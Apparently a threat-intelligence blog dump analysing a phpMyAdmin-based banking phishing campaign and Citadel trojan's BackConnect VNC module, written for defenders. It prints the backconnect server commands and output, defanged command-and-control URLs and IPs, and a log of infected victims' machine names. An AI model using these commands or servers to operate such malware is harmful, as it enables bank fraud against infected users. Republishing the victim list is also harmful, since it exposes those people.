<span style="font-family: "Arial","sans-serif";">Estos exploits aprovechan una debilidad en las opciones de configuración del servidor de phpmyadmin para subir una Shell php que permita a los criminales tomar el control de la máquina vulnerada.</span></div>
<span style="font-family: "Arial","sans-serif";">La siguiente fase consiste básicamente en la preparación del phishing contra las entidades bancarias objetivo. Para ello aprovechan la Shell alojada en los servidores comprometidos para subir el kit del phishing que suele consistir en un fichero .zip que contiene la copia clon exacta de la entidad financiera contra la cual quieren realizar el phishing. Estos kits ya están preparados para enviar los datos capturados a los usuarios engañados a ciertas direcciones de mail que han configurado los criminales en los scripts del phishing:</span> <br />
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">El objetivo principal de estos phishings es obtener datos confidenciales de las tarjetas de crédito de los clientes simulando ser peticiones de la entidad bancaria del cliente. Y sobre todo obtener el código PIN o ATM que se utiliza para operar en los cajeros automáticos y que en muchos comercios electrónicos y direcciones de banca electrónica es utilizado para contratar servicios financieros contra dicha tarjeta que serán utilizados posteriormente por los criminales para realizar transacciones comerciales fraudulentas.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-nvDxbifkJVs/UNRNooBSZbI/AAAAAAAAAVE/K85sKdro0Ac/s1600/3-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://2.bp.blogspot.com/-nvDxbifkJVs/UNRNooBSZbI/AAAAAAAAAVE/K85sKdro0Ac/s320/3-B.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-OuST9rctgMk/UNRKhuEfpJI/AAAAAAAAAUI/FzondnFci_k/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="http://2.bp.blogspot.com/-OuST9rctgMk/UNRKhuEfpJI/AAAAAAAAAUI/FzondnFci_k/s400/1.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif"; mso-fareast-language: ES; mso-no-proof: yes;"></span><span style="font-family: "Arial","sans-serif";"></span></div>
<span style="font-family: "Arial","sans-serif";"></span><br />
<div class="MsoNormal">
</div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-6YbEOgqasNs/UNRN7k4MdlI/AAAAAAAAAVM/9utVAzl9j3s/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="335" src="http://1.bp.blogspot.com/-6YbEOgqasNs/UNRN7k4MdlI/AAAAAAAAAVM/9utVAzl9j3s/s400/5.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";"></span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-eSq1oZRUmJw/UNROPvDocNI/AAAAAAAAAVc/RL6FYf0HpC0/s1600/popular.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="http://3.bp.blogspot.com/-eSq1oZRUmJw/UNROPvDocNI/AAAAAAAAAVc/RL6FYf0HpC0/s320/popular.jpg" width="320" /></a></div>
<a href="http://2.bp.blogspot.com/-tz6wSxsf0qQ/UNRN_zJ5tcI/AAAAAAAAAVU/oW_vRIDx-PI/s1600/7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-tz6wSxsf0qQ/UNRN_zJ5tcI/AAAAAAAAAVU/oW_vRIDx-PI/s320/7.jpg" width="220" /></a><br />
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif"; mso-fareast-language: ES; mso-no-proof: yes;"><br /></span><span style="font-family: "Arial","sans-serif";"></span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif"; mso-fareast-language: ES; mso-no-proof: yes;"><br /></span><span style="font-family: "Arial","sans-serif";"></span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif"; mso-fareast-language: ES; mso-no-proof: yes;"><br /></span><span style="font-family: "Arial","sans-serif";"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-_jw7aXsW7z4/UNRPB6XgRZI/AAAAAAAAAVs/fZ9T7iq1OPw/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="http://1.bp.blogspot.com/-_jw7aXsW7z4/UNRPB6XgRZI/AAAAAAAAAVs/fZ9T7iq1OPw/s400/4.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-1tOSD2ZXoEU/UNRKqOhhphI/AAAAAAAAAUY/2Xi0KC4fUFg/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/-1tOSD2ZXoEU/UNRKqOhhphI/AAAAAAAAAUY/2Xi0KC4fUFg/s400/2.jpg" width="387" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">La última etapa del fraude consistirá en lanzar una campaña de SPAM con correos conteniendo las URL falsas donde están alojados los phishings para intentar engañar a los usuarios y que visiten estas direcciones fraudulentas completando sus datos bancarios confidenciales.</span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">Estas herramientas de SPAM así como listas de direcciones de mail para spamear también están alojadas en el servidor fraudulento:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-zfZK13bcx0M/UNRP3LkvVUI/AAAAAAAAAV4/HGU5LwV-N-4/s1600/wells.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="http://4.bp.blogspot.com/-zfZK13bcx0M/UNRP3LkvVUI/AAAAAAAAAV4/HGU5LwV-N-4/s400/wells.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif"; mso-fareast-language: ES; mso-no-proof: yes;"><br /></span><span style="font-family: "Arial","sans-serif";"></span></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-88217433134963202562012-12-07T01:46:00.000-08:002012-12-07T02:46:16.867-08:00Troyan Citadel BackConnect VNC Server Manager<br />
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">The Citadel Troyan kit has a module that allows
criminals to connect remotely using VNC client to users' computers infected
with this Citadel malware<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-hG7CVZiKngs/UME6Xpq0J_I/AAAAAAAAATE/-RwgopE3QBo/s1600/vnc3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="31" src="http://3.bp.blogspot.com/-hG7CVZiKngs/UME6Xpq0J_I/AAAAAAAAATE/-RwgopE3QBo/s400/vnc3.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span><span style="font-family: Arial, sans-serif; font-size: 11pt;">This allows criminals connected to the infected
machine to make financial transactions through this way. This will make
fraudulent transfers undetectable by operational control systems of banks
because transfers are being made through the legitimate IP and legitimate computer
of customers.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">The structure of KIT VNC Manager is made up of the
following files:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ZuDOj5HY5aQ/UME6tGffOBI/AAAAAAAAATU/zEMXh85C1A4/s1600/vnc-good.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="http://1.bp.blogspot.com/-ZuDOj5HY5aQ/UME6tGffOBI/AAAAAAAAATU/zEMXh85C1A4/s400/vnc-good.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial, sans-serif; font-size: 11pt;">Script “test.php” is used to check the connectivity of
the infected computer.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://winserv_php_gate/test.php?p1=13319&p2=23283&b=AKSERVER_D9FA7E50D0F76FCB<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">The script code is as follows:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-CPtlE4boLKE/UME60vwxRBI/AAAAAAAAATc/7bJCPv7XOEE/s1600/test.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="http://1.bp.blogspot.com/-CPtlE4boLKE/UME60vwxRBI/AAAAAAAAATc/7bJCPv7XOEE/s400/test.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial, sans-serif; font-size: 11pt;">It is noted as the file that opens the tunnel against
the specified ports is the executable cbcs.exe (Citadel Backconnect Server), an
updated version of the same application for the famous Zeus Trojan: zsbcs.exe
(ZeuS Backconnect Server)</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">The way that initiates the connection is:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">C:\>zsbcs.exe listen –cp:13319 -bp:23283<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">C:\> cbcs.exe listen -cp:13319 -bp:23283<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Citadel Backconnect Server 1.2.0.0.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Build time: 13:12:41 07.12.2012 GMT.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Listening on IPv4 port 23283.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Listening on IPv4 port 13319.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Press Ctrl+C key to shutdown server.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Waiting for incoming connections (port of bot:23283,
port of client:13319)<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">After opened communications port tunnel, criminals can
connect remotely via VNC or execute commands against the infected user's
computer to have full control of the machine and its desktop. When infected
user interacts with its e-banking applications criminals can run scripts on the
infected machine to modify customer transactions and operate with user
credentials captured previously by the keylogger of the Citadel Troyan.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Access to the statistical panel that displays active
VNC connections is via URL: hXXp://ip-serv/control.html<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">On this server you can see the list of computers
infected with Trojan and have been used for fraudulent purposes by criminals at
hXXp://195.242.218.25/control.html<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-XIZxyFO3dA8/UME7HzLsafI/AAAAAAAAATk/P-_SLd5rFgk/s1600/vnc-control.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="283" src="http://2.bp.blogspot.com/-XIZxyFO3dA8/UME7HzLsafI/AAAAAAAAATk/P-_SLd5rFgk/s400/vnc-control.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial, sans-serif; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, sans-serif; font-size: 11pt;">This list of infected users is also stored in the
server file:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">hXXp://195.242.218.25/log.txt<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[04.09.2012
15:37:48] WOLF_7875768F483EE109, p1=11968 ,p2=34851<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[04.09.2012
15:38:22] PERSONAL_74DEB1E387314069, p1=18666 ,p2=38002<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[04.09.2012
23:48:39] ANDRES-HP_E532648A4A3763CB, p1=19870 ,p2=28229<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[04.09.2012
23:50:17] 3A0AAE55F75646A_7875768F3990DE0A, p1=14943 ,p2=36576<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[04.09.2012
23:51:50] ADMIN-PC_74DEB1E3F090E324, p1=17688 ,p2=31963<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[05.09.2012
17:37:08] DIAL_INT-PC_E532648A8AFF5F32, p1=15504 ,p2=35943<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[05.09.2012
17:38:35] LUIS-4E3325EABE_B4DF7611605FA143, p1=11689 ,p2=29435<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[06.09.2012
13:53:25] RAULSISTEMAS_4983EC5A2711C179, p1=12665 ,p2=24109<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[06.09.2012
13:55:15] CARLOS_7875768F483EE109, p1=18871 ,p2=25181<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[06.09.2012
13:55:49] JAVIER_B4DF7611483EE109, p1=11475 ,p2=26807<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[06.09.2012
13:56:24] OMARVAZQUEZ_1CB98D876522DF69, p1=15011 ,p2=31385<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[06.09.2012
13:57:45] PUESTOV_4983EC5ACB9AD960, p1=19115 ,p2=34960<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[07.09.2012
15:47:07] SHXP2364_7875768F7E657C89, p1=14409 ,p2=36871<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[07.09.2012
15:48:23] PERSONAL_74DEB1E387314069, p1=10806 ,p2=34226<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[07.09.2012 15:48:34] PC-JAVIER_7875768FEABD3289,
p1=17728 ,p2=36485<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[07.09.2012
15:49:00] DIAGONALMARLIM1_4A073834B2FFEE74, p1=18676 ,p2=28923<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: Arial, sans-serif;"><span style="font-size: xx-small;">[07.09.2012
15:50:10] ANA-MARI-THINK_74DEB1E315C0DF75, p1=19752 ,p2=37007</span><span style="font-size: 11pt;"><o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">This list contains only users from Spain that have
probably been victims of fraud in their online bank accounts.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Currently other servers have been located containing
the same VNC criminal infrastructure:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://95.77.98.137/ hosted on the provider UPC
Romania BUCURESTI B2B MPLS From Romania<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-PgwOkcP7FGo/UME6lI7vY4I/AAAAAAAAATM/Y30acO9vovY/s1600/vnc4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://1.bp.blogspot.com/-PgwOkcP7FGo/UME6lI7vY4I/AAAAAAAAATM/Y30acO9vovY/s400/vnc4.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://www.wanderbaresdeutschland.de/ </span><span class="hps"><span lang="EN" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN;">hosted</span></span><span lang="EN" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN;"> <span class="hps">on the
IP</span> <span class="hps">85.214.116.67</span> <span class="hps">belonging to provider</span> <span class="hps">stratoserver.net</span>
<span class="hps">from</span> <span class="hps">Germany</span></span><span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN;"><span class="hps"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-wLngDupxMTI/UME7RXRIa3I/AAAAAAAAATs/i5oEodbzVHY/s1600/vnc5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-wLngDupxMTI/UME7RXRIa3I/AAAAAAAAATs/i5oEodbzVHY/s400/vnc5.jpg" width="332" /></a></div>
<div class="MsoNormal">
<span lang="EN" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN;"><span class="hps"><br /></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://46.166.129.65/ hosted on the provider SANTREX-INTERNET-SERVICES
from UK<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-49245746297148705572012-12-06T16:44:00.001-08:002012-12-06T16:46:53.740-08:00Troyano Citadel BackConnect Windows Server VNC Manager<br />
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">El kit del
troyano Citadel tiene un modulo que permite conectarse remotamente mediante el
cliente VNC a los equipos de los usuarios infectados por el troyano</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-hG7CVZiKngs/UME6Xpq0J_I/AAAAAAAAATE/-RwgopE3QBo/s1600/vnc3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="http://3.bp.blogspot.com/-hG7CVZiKngs/UME6Xpq0J_I/AAAAAAAAATE/-RwgopE3QBo/s400/vnc3.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span class="hps"><span lang="ES" style="font-family: Arial; font-size: 11.0pt; mso-ansi-language: ES;">Esto permite a los criminales conectarse
a</span></span><span lang="ES" style="font-family: Arial; font-size: 11pt;"> <span class="hps">la máquina infectada</span> <span class="hps">para hacer transacciones</span> <span class="hps">financieras</span> <span class="hps">a través de esta, lo que hará que las transferencias fraudulentas sean
prácticamente indetectables por los sistemas de control de operaciones del
banco puesto que se están realizando a través de <st1:personname productid="la IP" w:st="on">la IP</st1:personname> y equipo legitimo del
cliente.</span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">La
estructura del KIT del VNC Manager esta constituida por los siguientes
ficheros:<o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ZuDOj5HY5aQ/UME6tGffOBI/AAAAAAAAATU/zEMXh85C1A4/s1600/vnc-good.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="http://1.bp.blogspot.com/-ZuDOj5HY5aQ/UME6tGffOBI/AAAAAAAAATU/zEMXh85C1A4/s400/vnc-good.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">El script
test.php se emplea para comprobar la conectividad del equipo infectado.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://winserv_php_gate/test.php?p1=13319&p2=23283&b=AKSERVER_D9FA7E50D0F76FCB<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">El código
de este script es el siguiente:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-CPtlE4boLKE/UME60vwxRBI/AAAAAAAAATc/7bJCPv7XOEE/s1600/test.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="http://1.bp.blogspot.com/-CPtlE4boLKE/UME60vwxRBI/AAAAAAAAATc/7bJCPv7XOEE/s400/test.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Se observa
como el archivo que abre el tunel contra los puertos indicados es el ejecutable
cbcs.exe (Citadel Backconnect Server) , una versión actualizada de la misma
aplicación para el famoso troyano ZEUS: zsbcs.exe</span><span style="font-family: Arial; font-size: 11pt;"> </span><span style="font-family: Arial; font-size: 11pt;">(ZeuS BackConnect Server)</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">La forma
como se inicia la conexión es la siguiente:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">C:\>zsbcs.exe
listen –cp:13319 -bp:23283<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">C:\>
cbcs.exe listen -cp:13319 -bp:23283<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Citadel
Backconnect Server 1.2.0.0.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Build time:
13:12:41 07.12.2012 GMT.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Listening
on IPv4 port 23283.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Listening
on IPv4 port 13319.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Press
Ctrl+C key to shutdown server.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Waiting for
incoming connections (port of bot:23283, port of client:13319)<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Una vez
abierto el túnel, el criminal podrá conectarse en remoto mediante VNC o
ejecutar comandos contra el equipo del usuario infectado teniendo total control
de la máquina y su escritorio. Observando cuando el usuario interactúa con sus
aplicaciones de banca electrónica y ejecutar scripts en la máquina infectada
para modificar las transacciones del cliente y operar con las credenciales del
usuario robadas por el troyano citadel.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Para
acceder al panel estadístico con las conexiones VNC validas se visualizan
mediante <st1:personname productid="la URL" w:st="on">la URL</st1:personname>: hXXp://ip-serv/control.html<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">En el
servidor localizado anteriormente se observa la lista de equipos infectados por
el troyano y que han sido utilizados por los criminales para sus propósitos
fraudulentos en la dirección: </span><br />
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span>
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://195.242.218.25/control.html<o:p></o:p></span><br />
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-XIZxyFO3dA8/UME7HzLsafI/AAAAAAAAATk/P-_SLd5rFgk/s1600/vnc-control.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="283" src="http://2.bp.blogspot.com/-XIZxyFO3dA8/UME7HzLsafI/AAAAAAAAATk/P-_SLd5rFgk/s400/vnc-control.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Esta lista
de usuarios infectados también se almacena en el achivo: hXXp://195.242.218.25/log.txt</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[04.09.2012
15:37:48] WOLF_7875768F483EE109, p1=11968 ,p2=34851<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[04.09.2012
15:38:22] PERSONAL_74DEB1E387314069, p1=18666 ,p2=38002<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[04.09.2012
23:48:39] ANDRES-HP_E532648A4A3763CB, p1=19870 ,p2=28229<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[04.09.2012
23:50:17] 3A0AAE55F75646A_7875768F3990DE0A, p1=14943 ,p2=36576<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[04.09.2012
